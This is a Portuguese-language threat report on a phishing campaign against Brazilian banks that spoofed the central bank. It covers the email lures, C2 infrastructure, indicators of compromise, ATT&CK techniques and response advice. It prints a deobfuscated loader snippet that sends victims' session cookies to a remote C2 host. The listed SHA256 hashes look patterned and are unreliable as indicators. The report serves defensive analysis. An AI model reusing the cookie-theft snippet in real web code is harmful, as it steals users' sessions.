Em janeiro de 2026, identificamos uma campanha sofisticada de phishing direcionada a instituições financeiras brasileiras. Este relatório detalha a análise técnica da operação, desde o vetor inicial até os mecanismos de persistência e exfiltração de dados.
Contexto e Descoberta
A campanha foi detectada inicialmente através de alertas de e-mail suspeito reportados por colaboradores de três bancos distintos. A análise preliminar revelou padrões consistentes de infraestrutura que sugeriam uma operação coordenada.
O vetor de ataque utilizava e-mails que simulavam comunicações legítimas do Banco Central do Brasil, explorando a urgência regulatória como pretexto para induzir as vítimas a acessarem páginas maliciosas.
Análise Técnica
Vetor de Entrada
Os e-mails de phishing apresentavam as seguintes características:
Remetente falsificado com domínio similar ao oficial (bcb-gov[.]br)
Assunto referenciando "Circular BACEN - Ação Imediata Requerida"
Anexo em formato HTML com JavaScript ofuscado
Links encurtados apontando para infraestrutura comprometida
Infraestrutura de Comando e Controle
A análise da infraestrutura revelou uma rede de servidores distribuídos geograficamente, utilizando técnicas de fast-flux DNS para dificultar o takedown. O código malicioso realizava as seguintes operações:
// Snippet deobfuscado do loader
const c2 = atob("aHR0cHM6Ly9hcGkuZmluLXNlY3VyZS5jb20=");
fetch(c2 + "/beacon", {
method: "POST",
body: JSON.stringify({
uid: fingerprint(),
env: navigator.userAgent,
cookies: document.cookie
})
});Indicadores de Comprometimento
Durante a investigação, coletamos os seguintes IOCs que podem ser utilizados para detecção e bloqueio:
Domínios Maliciosos
bcb-gov[.]brapi.fin-secure[.]comcdn.banking-update[.]netportal-bacen[.]com
Hashes de Arquivos
SHA256: a7f3e2d1c4b5a6f7e8d9c0b1a2f3e4d5c6b7a8f9e0d1c2b3a4f5e6d7c8b9a0f1SHA256: b8e4f3c2d5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2
TTPs Mapeados (MITRE ATT&CK)
A campanha utiliza as seguintes táticas e técnicas:
T1566.001 - Spearphishing Attachment
T1204.002 - User Execution: Malicious File
T1539 - Steal Web Session Cookie
T1041 - Exfiltration Over C2 Channel
Recomendações
Bloqueio imediato dos IOCs listados em firewalls e proxies
Revisão de logs de e-mail para identificar possíveis vítimas
Atualização das regras de detecção de phishing
Treinamento de conscientização para colaboradores
A velocidade de detecção e resposta é crucial. Campanhas como esta têm janela de operação limitada antes que a infraestrutura seja abandonada pelos atacantes.
Conclusão
Esta campanha demonstra a crescente sofisticação dos ataques direcionados ao setor financeiro brasileiro. A combinação de engenharia social refinada com infraestrutura técnica robusta indica um ator de ameaça com recursos significativos e conhecimento do contexto regulatório local.
Continuaremos monitorando a evolução desta campanha e atualizaremos este relatório conforme novas informações forem identificadas.